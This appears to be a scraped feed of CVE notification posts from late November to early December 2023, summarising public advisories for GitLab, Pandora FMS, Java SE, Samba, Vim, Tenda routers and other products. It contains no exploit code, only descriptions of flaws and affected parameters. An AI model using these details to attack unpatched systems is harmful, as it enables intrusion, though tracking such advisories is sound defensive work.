🚨 CVE-2012-5053Cross-site scripting (XSS) vulnerability in the Receiver Web User Interface on Trimble Infrastructure GNSS Series Receivers NetR3, NetR5, NetR8, and NetR9 before 4.70, and NetRS before 1.3-2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.🎖@cveNotify |
|
| 2023-12-01 14:00:31 |
🚨 CVE-2023-5226An issue has been discovered in GitLab affecting all versions before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. Under certain circumstances, a malicious actor bypass prohibited branch checks using a specially crafted branch name to manipulate repository content in the UI.🎖@cveNotify |
|
| 2023-12-01 14:00:25 |
🚨 CVE-2023-4912An issue has been discovered in GitLab EE affecting all versions starting from 10.5 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for an attacker to cause a client-side denial of service using malicious crafted mermaid diagram input.🎖@cveNotify |
|
| 2023-12-01 14:00:24 |
🚨 CVE-2023-3964An issue has been discovered in GitLab affecting all versions starting from 13.2 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for users to access composer packages on public projects that have package registry disabled in the project settings.🎖@cveNotify |
|
| 2023-12-01 14:00:23 |
🚨 CVE-2023-3949An issue has been discovered in GitLab affecting all versions starting from 11.3 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for unauthorized users to view a public projects' release descriptions via an atom endpoint when release access on the public was set to only project members.🎖@cveNotify |
|
| 2023-12-01 14:00:20 |
🚨 CVE-2023-3443An issue has been discovered in GitLab affecting all versions starting from 12.1 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for a Guest user to add an emoji on confidential work items.🎖@cveNotify |
|
| 2023-12-01 14:00:19 |
🚨 CVE-2023-45252DLL Hijacking vulnerability in Huddly HuddlyCameraService before version 8.0.7, not including version 7.99, due to the installation of the service in a directory that grants write privileges to standard users, allows attackers to manipulate files, execute arbitrary code, and escalate privileges.🎖@cveNotify |
|
| 2023-12-01 11:29:56 |
🚨 CVE-2023-5427A local non-privileged user can make improper GPU processing operations to gain access to already freed memory.🎖@cveNotify |
|
| 2023-12-01 07:30:03 |
🚨 CVE-2023-5995An issue has been discovered in GitLab EE affecting all versions starting from 16.2 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for an attacker to abuse the policy bot to gain access to internal projects.🎖@cveNotify |
|
| 2023-12-01 07:30:02 |
🚨 CVE-2023-4912An issue has been discovered in GitLab EE affecting all versions starting from 10.5 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for an attacker to cause a client-side denial of service using malicious crafted mermaid diagram input.🎖@cveNotify |
|
| 2023-12-01 07:29:57 |
🚨 CVE-2023-3964An issue has been discovered in GitLab affecting all versions starting from 13.2 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for users to access composer packages on public projects that have package registry disabled in the project settings.🎖@cveNotify |
|
| 2023-12-01 07:29:56 |
🚨 CVE-2023-3443An issue has been discovered in GitLab affecting all versions starting from 12.1 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for a Guest user to add an emoji on confidential work items.🎖@cveNotify |
|
| 2023-12-01 06:29:57 |
🚨 CVE-2023-45253An issue was discovered in Huddly HuddlyCameraService before version 8.0.7, not including version 7.99, allows attackers to manipulate files and escalate privileges via RollingFileAppender.DeleteFile method performed by the log4net library.🎖@cveNotify |
|
| 2023-12-01 06:29:56 |
🚨 CVE-2022-45582Open Redirect vulnerability in Horizon Web Dashboard 19.4.0 thru 20.1.4 via the success_url parameter.🎖@cveNotify |
|
| 2023-12-01 04:30:00 |
🚨 CVE-2023-48188SQL injection vulnerability in PrestaShop opartdevis v.4.5.18 thru v.4.6.12 allows a remote attacker to execute arbitrary code via a crafted script to the getModuleTranslation function.🎖@cveNotify |
|
| 2023-12-01 04:29:59 |
🚨 CVE-2023-49044Stack Overflow vulnerability in Tenda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the ssid parameter in the function form_fast_setting_wifi_set.🎖@cveNotify |
|
| 2023-12-01 03:29:56 |
🚨 CVE-2023-48016Restaurant Table Booking System V1.0 is vulnerable to SQL Injection in rtbs/admin/index.php via the username parameter.🎖@cveNotify |
|
| 2023-12-01 02:59:57 |
🚨 CVE-2023-49043Buffer Overflow vulnerability in Tenda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the wpapsk_crypto parameter in the function fromSetWirelessRepeat.🎖@cveNotify |
|
| 2023-11-24 09:30:25 |
🚨 CVE-2023-5369Before correction, the copy_file_range system call checked only for the CAP_READ and CAP_WRITE capabilities on the input and output file descriptors, respectively. Using an offset is logically equivalent to seeking, and the system call must additionally require the CAP_SEEK capability.This incorrect privilege check enabled sandboxed processes with only read or write but no seek capability on a file descriptor to read data from or write data to an arbitrary location within the file corresponding to that file descriptor.🎖@cveNotify |
|
| 2023-11-24 09:30:18 |
🚨 CVE-2023-3489The firmwaredownload command on Brocade Fabric OS v9.2.0 could log the FTP/SFTP/SCP server password in clear text in the SupportSave file when performing a downgrade from Fabric OS v9.2.0 to any earlier version of Fabric OS.🎖@cveNotify |
|
| 2023-11-24 09:30:17 |
🚨 CVE-2022-38087Exposure of resource to wrong sphere in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-11-24 08:29:56 |
🚨 CVE-2023-6118Path Traversal: '/../filedir' vulnerability in Neutron IP Camera allows Absolute Path Traversal.This issue affects IP Camera: before b1130.1.0.1.🎖@cveNotify |
|
| 2023-11-24 03:30:26 |
🚨 CVE-2023-48236Vim is an open source command line text editor. When using the z= command, the user may overflow the count with values largerthan MAX_INT. Impact is low, user interaction is required and a crash may not even happen in all situations. This vulnerability has been addressed in commit `73b2d379` which has been included in release version 9.0.2111. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-11-24 03:30:19 |
🚨 CVE-2023-48232Vim is an open source command line text editor. A floating point exception may occur when calculating the line offset for overlong lines and smooth scrolling is enabled and the cpo-settings include the 'n' flag. This may happen when a window border is present and when the wrapped line continues on the next physical line directly in the window border because the 'cpo' setting includes the 'n' flag. Only users with non-default settings are affected and the exception should only result in a crash. This issue has been addressed in commit `cb0b99f0` which has been included in release version 9.0.2107. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-11-24 03:30:18 |
🚨 CVE-2023-48231Vim is an open source command line text editor. When closing a window, vim may try to access already freed window structure. Exploitation beyond crashing the application has not been shown to be viable. This issue has been addressed in commit `25aabc2b` which has been included in release version 9.0.2106. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-11-24 02:30:17 |
🚨 CVE-2023-23583Sequence of processor instructions leads to unexpected behavior for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or information disclosure and/or denial of service via local access.🎖@cveNotify |
|
| 2023-11-24 00:30:00 |
🚨 CVE-2023-26279IBM QRadar WinCollect Agent 10.0 through 10.1.7 could allow a local user to perform unauthorized actions due to improper encoding. IBM X-Force ID: 248160.🎖@cveNotify |
|
| 2023-11-23 23:30:00 |
🚨 CVE-2021-39008IBM QRadar WinCollect Agent 10.0 through 10.1.7 could allow a privileged user to obtain sensitive information due to missing best practices. IBM X-Force ID: 213551.🎖@cveNotify |
|
| 2023-11-23 22:30:02 |
🚨 CVE-2023-49214Usedesk before 1.7.57 allows chat template injection.🎖@cveNotify |
|
| 2023-11-23 22:30:01 |
🚨 CVE-2023-49213The API endpoints in Ironman PowerShell Universal 3.0.0 through 4.2.0 allow remote attackers to execute arbitrary commands via crafted HTTP requests if a param block is used, due to invalid sanitization of input strings. The fixed versions are 3.10.2, 4.1.10, and 4.2.1.🎖@cveNotify |
|
| 2023-11-23 21:29:56 |
🚨 CVE-2023-47244Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Omnisend Email Marketing for WooCommerce by Omnisend.This issue affects Email Marketing for WooCommerce by Omnisend: from n/a through 1.13.8.🎖@cveNotify |
|
| 2023-11-23 20:30:05 |
🚨 CVE-2023-49210The openssl (aka node-openssl) NPM package through 2.0.0 was characterized as "a nonsense wrapper with no real purpose" by its author, and accepts an opts argument that contains a verb field (used for command execution). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-11-23 18:30:10 |
🚨 CVE-2023-49208scheme/webauthn.c in Glewlwyd SSO server before 2.7.6 has a possible buffer overflow during FIDO2 credentials validation in webauthn registration.🎖@cveNotify |
|
| 2023-11-23 15:30:10 |
🚨 CVE-2023-41812Unrestricted Upload of File with Dangerous Type vulnerability in Pandora FMS on all allows Accessing Functionality Not Properly Constrained by ACLs. This vulnerability allowed PHP executable files to be uploaded through the file manager. This issue affects Pandora FMS: from 700 through 773.🎖@cveNotify |
|
| 2023-11-23 15:30:09 |
🚨 CVE-2023-41811Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). This vulnerability allowed Javascript code to be executed in the news section of the web console. This issue affects Pandora FMS: from 700 through 773.🎖@cveNotify |
|
| 2023-11-23 15:30:08 |
🚨 CVE-2023-41810Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). This vulnerability allowed Javascript code to be executed in some Widgets' text box. This issue affects Pandora FMS: from 700 through 773.🎖@cveNotify |
|
| 2023-11-23 15:30:07 |
🚨 CVE-2023-41808Improper Privilege Management vulnerability in Pandora FMS on all allows Privilege Escalation. This vulnerability allows an unauthorised user to escalate and read sensitive files as if they were root. This issue affects Pandora FMS: from 700 through 773.🎖@cveNotify |
|
| 2023-11-23 15:30:04 |
🚨 CVE-2023-41807Improper Privilege Management vulnerability in Pandora FMS on all allows Privilege Escalation. This vulnerability allows a user to escalate permissions on the system shell. This issue affects Pandora FMS: from 700 through 773.🎖@cveNotify |
|
| 2023-11-23 15:30:03 |
🚨 CVE-2023-41792Cross-Site Request Forgery (CSRF) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). This vulnerability allowed Javascript code to be executed in the SNMP Trap Editor. This issue affects Pandora FMS: from 700 through 773.🎖@cveNotify |
|
| 2023-11-23 15:30:02 |
🚨 CVE-2023-41790Uncontrolled Search Path Element vulnerability in Pandora FMS on all allows Leveraging/Manipulating Configuration File Search Paths. This vulnerability allows to access the server configuration file and to compromise the database. This issue affects Pandora FMS: from 700 through 773.🎖@cveNotify |
|
| 2023-11-23 15:29:58 |
🚨 CVE-2023-41788Unrestricted Upload of File with Dangerous Type vulnerability in Pandora FMS on all allows Accessing Functionality Not Properly Constrained by ACLs. This vulnerability allows attackers to execute code via PHP file uploads. This issue affects Pandora FMS: from 700 through 773.🎖@cveNotify |
|
| 2023-11-23 15:29:57 |
🚨 CVE-2023-43123On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems.The method File.createTempFile on unix-like systems creates a file with predefined name (so easily identifiable) and by default will create this file with the permissions -rw-r--r--. Thus, if sensitive information is written to this file, other local users can read this information.File.createTempFile(String, String) will create a temporary file in the system temporary directory if the 'java.io.tmpdir' system property is not explicitly set. This affects the class https://github.com/apache/storm/blob/master/storm-core/src/jvm/org/apache/storm/utils/TopologySpoutLag.java#L99 and was introduced by https://issues.apache.org/jira/browse/STORM-3123 In practice, this has a very limited impact as this class is used only if ui.disable.spout.lag.monitoring is set to false, but its value is true by default.Moreover, the temporary file gets deleted soon after its creation.The solution is to use Files.createTempFile https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/nio/file/Files.html#createTempFile(java.lang.String,java.lang.String,java.nio.file.attribute.FileAttribute...) instead.We recommend that all users upgrade to the latest version of Apache Storm.🎖@cveNotify |
|
| 2023-11-23 14:29:56 |
🚨 CVE-2021-33842Improper Authentication vulnerability in the cookie parameter of Circutor SGE-PLC1000 firmware version 0.9.2b allows an attacker to perform operations as an authenticated user. In order to exploit this vulnerability, the attacker must be within the network where the device affected is located.🎖@cveNotify |
|
| 2023-11-23 13:30:11 |
🚨 CVE-2023-4593Path traversal vulnerability whose exploitation could allow an authenticated remote user to bypass SecurityManager's intended restrictions and list a parent directory via any filename, such as a multiple ..%2F value affecting the 'dodoc' parameter in the /MailAdmin_dll.htm file.🎖@cveNotify |
|
| 2023-11-22 00:25:41 |
🚨 CVE-2023-48052Missing SSL certificate validation in HTTPie v3.2.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.🎖@cveNotify |
|
| 2023-11-22 00:25:40 |
🚨 CVE-2021-42362The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.🎖@cveNotify |
|
| 2023-11-21 23:25:46 |
🚨 CVE-2023-48701Statamic CMS is a Laravel and Git powered content management system (CMS). Prior to versions 3.4.15 an 4.36.0, HTML files crafted to look like images may be uploaded regardless of mime validation. This is only applicable on front-end forms using the "Forms" feature containing an assets field, or within the control panel which requires authentication. This issue has been patched on 3.4.15 and 4.36.0.🎖@cveNotify |
|
| 2023-11-21 23:25:45 |
🚨 CVE-2023-48700The Nautobot Device Onboarding plugin uses the netmiko and NAPALM libraries to simplify the onboarding process of a new device into Nautobot down to, in many cases, an IP Address and a Location. Starting in version 2.0.0 and prior to version 3.0.0, credentials provided to onboarding task are visible via Job Results from an execution of an Onboarding Task. Version 3.0.0 fixes this issue; no known workarounds are available. Mitigation recommendations include deleting all Job Results for any onboarding task to remove clear text credentials from database entries that were run while on v2.0.X, upgrading to v3.0.0, and rotating any exposed credentials.🎖@cveNotify |
|
| 2023-11-21 23:25:41 |
🚨 CVE-2023-48307Nextcloud Mail is the mail app for Nextcloud, a self-hosted productivity platform. Starting in version 1.13.0 and prior to version 2.2.8 and 3.3.0, an attacker can use an unprotected endpoint in the Mail app to perform a SSRF attack. Nextcloud Mail app versions 2.2.8 and 3.3.0 contain a patch for this issue. As a workaround, disable the mail app.🎖@cveNotify |
|
| 2023-11-21 23:25:40 |
🚨 CVE-2023-48310TestingPlatform is a testing platform for Internet Security Standards. Prior to version 2.1.1, user input is not filtered correctly. Nmap options are accepted. In this particular case, the option to create log files is accepted in addition to a host name (and even without). A log file is created at the location specified. These files are created as root. If the file exists, the existing file is being rendered useless. This can result in denial of service. Additionally, input for scanning can be any CIDR blocks passed to nmap. An attacker can scan 0.0.0.0/0 or even local networks. Version 2.1.1 contains a patch for this issue.🎖@cveNotify |
|
| 2023-11-21 21:55:40 |
🚨 CVE-2021-3947A stack-buffer-overflow was found in QEMU in the NVME component. The flaw lies in nvme_changed_nslist() where a malicious guest controlling certain input can read out of bounds memory. A malicious user could use this flaw leading to disclosure of sensitive information.🎖@cveNotify |
|
| 2023-11-21 21:25:46 |
🚨 CVE-2023-48299TorchServe is a tool for serving and scaling PyTorch models in production. Starting in version 0.1.0 and prior to version 0.9.0, using the model/workflow management API, there is a chance of uploading potentially harmful archives that contain files that are extracted to any location on the filesystem that is within the process permissions. Leveraging this issue could aid third-party actors in hiding harmful code in open-source/public models, which can be downloaded from the internet, and take advantage of machines running Torchserve. The ZipSlip issue in TorchServe has been fixed by validating the paths of files contained within a zip archive before extracting them. TorchServe release 0.9.0 includes fixes to address the ZipSlip vulnerability.🎖@cveNotify |
|
| 2023-11-21 21:25:45 |
🚨 CVE-2023-48230Cap'n Proto is a data interchange format and capability-based RPC system. In versions 1.0 and 1.0.1, when using the KJ HTTP library with WebSocket compression enabled, a buffer underrun can be caused by a remote peer. The underrun always writes a constant value that is not attacker-controlled, likely resulting in a crash, enabling a remote denial-of-service attack. Most Cap'n Proto and KJ users are unlikely to have this functionality enabled and so unlikely to be affected. Maintainers suspect only the Cloudflare Workers Runtime is affected.If KJ HTTP is used with WebSocket compression enabled, a malicious peer may be able to cause a buffer underrun on a heap-allocated buffer. KJ HTTP is an optional library bundled with Cap'n Proto, but is not directly used by Cap'n Proto. WebSocket compression is disabled by default. It must be enabled via a setting passed to the KJ HTTP library via `HttpClientSettings` or `HttpServerSettings`. The bytes written out-of-bounds are always a specific constant 4-byte string `{ 0x00, 0x00, 0xFF, 0xFF }`. Because this string is not controlled by the attacker, maintainers believe it is unlikely that remote code execution is possible. However, it cannot be ruled out. This functionality first appeared in Cap'n Proto 1.0. Previous versions are not affected.This issue is fixed in Cap'n Proto 1.0.1.1.🎖@cveNotify |
|
| 2023-11-21 21:25:41 |
🚨 CVE-2023-48228authentik is an open-source identity provider. When initialising a oauth2 flow with a `code_challenge` and `code_method` (thus requesting PKCE), the single sign-on provider (authentik) must check if there is a matching and existing `code_verifier` during the token step. Prior to versions 2023.10.4 and 2023.8.5, authentik checks if the contents of `code_verifier` is matching only when it is provided. When it is left out completely, authentik simply accepts the token request with out it; even when the flow was started with a `code_challenge`. authentik 2023.8.5 and 2023.10.4 fix this issue.🎖@cveNotify |
|
| 2023-11-21 21:25:40 |
🚨 CVE-2023-45616There is a buffer overflow vulnerability in the underlying AirWave client service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-11-21 20:55:53 |
🚨 CVE-2021-27504Texas Instruments devices running FREERTOS, malloc returns a valid pointer to a small buffer on extremely large values, which can trigger an integer overflow vulnerability in 'malloc' for FreeRTOS, resulting in code execution.🎖@cveNotify |
|
| 2023-11-21 20:55:46 |
🚨 CVE-2023-45615There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-11-21 20:55:45 |
🚨 CVE-2023-45614There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-11-21 20:55:41 |
🚨 CVE-2023-20596Improper input validation in the SMM Supervisor may allow an attacker with a compromised SMI handler to gain Ring0 access potentially leading to arbitrary code execution.🎖@cveNotify |
|
| 2023-11-21 20:55:40 |
🚨 CVE-2021-31852A Reflected Cross-Site Scripting vulnerability in McAfee Policy Auditor prior to 6.5.2 allows a remote unauthenticated attacker to inject arbitrary web script or HTML via the UID request parameter. The malicious script is reflected unmodified into the Policy Auditor web-based interface which could lead to the extract of end user session token or login credentials. These may be used to access additional security-critical applications or conduct arbitrary cross-domain requests.🎖@cveNotify |
|
| 2023-11-21 20:25:53 |
🚨 CVE-2023-36558ASP.NET Core - Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-11-21 20:25:46 |
🚨 CVE-2023-26222The Web Application component of TIBCO Software Inc.'s TIBCO EBX and TIBCO Product and Service Catalog powered by TIBCO EBX contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute a stored XSS on the affected system. Affected releases are TIBCO Software Inc.'s TIBCO EBX: versions 5.9.22 and below, versions 6.0.13 and below and TIBCO Product and Service Catalog powered by TIBCO EBX: versions 5.0.0 and below.🎖@cveNotify |
|
| 2023-11-21 20:25:45 |
🚨 CVE-2023-34997Insecure inherited permissions in the installer for some Intel Server Configuration Utility software before version 16.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-21 20:25:41 |
🚨 CVE-2023-34350Uncontrolled search path element in some Intel(R) XTU software before version 7.12.0.15 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-21 20:25:40 |
🚨 CVE-2023-32701Improper Input Validation in the Networking Stack of QNX SDP version(s) 6.6, 7.0, and 7.1 could allow an attacker to potentially cause Information Disclosure or a Denial-of-Service condition.🎖@cveNotify |
|
| 2023-11-21 19:55:41 |
🚨 CVE-2023-47678An improper access control vulnerability exists in RT-AC87U all versions. An attacker may read or write files that are not intended to be accessed by connecting to a target device via tftp.🎖@cveNotify |
|
| 2023-11-21 19:55:40 |
🚨 CVE-2023-32662Improper authorization in some Intel Battery Life Diagnostic Tool installation software before version 2.2.1 may allow a privilaged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-21 19:25:52 |
🚨 CVE-2018-2633Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-11-21 19:25:51 |
🚨 CVE-2018-2629Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JGSS). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, JRockit accessible data. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N).🎖@cveNotify |
|
| 2023-11-21 19:25:47 |
🚨 CVE-2018-2627Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Installer). Supported versions that are affected are Java SE: 8u152 and 9.0.1. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Java SE executes to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to the Windows installer only. CVSS 3.0 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-11-21 19:25:46 |
🚨 CVE-2018-2599Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded, JRockit accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 4.8 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L).🎖@cveNotify |
|
| 2023-11-21 19:25:41 |
🚨 CVE-2018-2581Vulnerability in the Java SE component of Oracle Java SE (subcomponent: JavaFX). Supported versions that are affected are Java SE: 7u161, 8u152 and 9.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-11-21 19:25:40 |
🚨 CVE-2015-4036Array index error in the tcm_vhost_make_tpg function in drivers/vhost/scsi.c in the Linux kernel before 4.0 might allow guest OS users to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted VHOST_SCSI_SET_ENDPOINT ioctl call. NOTE: the affected function was renamed to vhost_scsi_make_tpg before the vulnerability was announced.🎖@cveNotify |
|
| 2023-11-21 18:55:46 |
🚨 CVE-2023-38411Improper access control in the Intel Smart Campus android application before version 9.4 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-21 18:55:41 |
🚨 CVE-2018-2641Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 6.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N).🎖@cveNotify |
|
| 2023-11-21 18:25:53 |
🚨 CVE-2023-42669A vulnerability was found in Samba's "rpcecho" development server, a non-Windows RPC server used to test Samba's DCE/RPC stack elements. This vulnerability stems from an RPC function that can be blocked indefinitely. The issue arises because the "rpcecho" service operates with only one worker in the main RPC task, allowing calls to the "rpcecho" server to be blocked for a specified time, causing service disruptions. This disruption is triggered by a "sleep()" call in the "dcesrv_echo_TestSleep()" function under specific conditions. Authenticated users or attackers can exploit this vulnerability to make calls to the "rpcecho" server, requesting it to block for a specified duration, effectively disrupting most services and leading to a complete denial of service on the AD DC. The DoS affects all other services as "rpcecho" runs in the main RPC task.🎖@cveNotify |
|
| 2023-11-21 18:25:47 |
🚨 CVE-2023-3961A path traversal vulnerability was identified in Samba when processing client pipe names connecting to Unix domain sockets within a private directory. Samba typically uses this mechanism to connect SMB clients to remote procedure call (RPC) services like SAMR LSA or SPOOLSS, which Samba initiates on demand. However, due to inadequate sanitization of incoming client pipe names, allowing a client to send a pipe name containing Unix directory traversal characters (../). This could result in SMB clients connecting as root to Unix domain sockets outside the private directory. If an attacker or client managed to send a pipe name resolving to an external service using an existing Unix domain socket, it could potentially lead to unauthorized access to the service and consequential adverse events, including compromise or service crashes.🎖@cveNotify |
|
| 2023-11-21 18:25:46 |
🚨 CVE-2023-5380A use-after-free flaw was found in the xorg-x11-server. An X server crash may occur in a very specific and legacy configuration (a multi-screen setup with multiple protocol screens, also known as Zaphod mode) if the pointer is warped from within a window on one screen to the root window of the other screen and if the original window is destroyed followed by another window being destroyed.🎖@cveNotify |
|
| 2023-11-21 18:25:45 |
🚨 CVE-2023-4806A flaw was found in glibc. In an extremely rare situation, the getaddrinfo function may access memory that has been freed, resulting in an application crash. This issue is only exploitable when a NSS module implements only the _nss_*_gethostbyname2_r and _nss_*_getcanonname_r hooks without implementing the _nss_*_gethostbyname3_r hook. The resolved name should return a large number of IPv6 and IPv4, and the call to the getaddrinfo function should have the AF_INET6 address family with AI_CANONNAME, AI_ALL and AI_V4MAPPED as flags.🎖@cveNotify |
|
| 2023-11-21 18:25:41 |
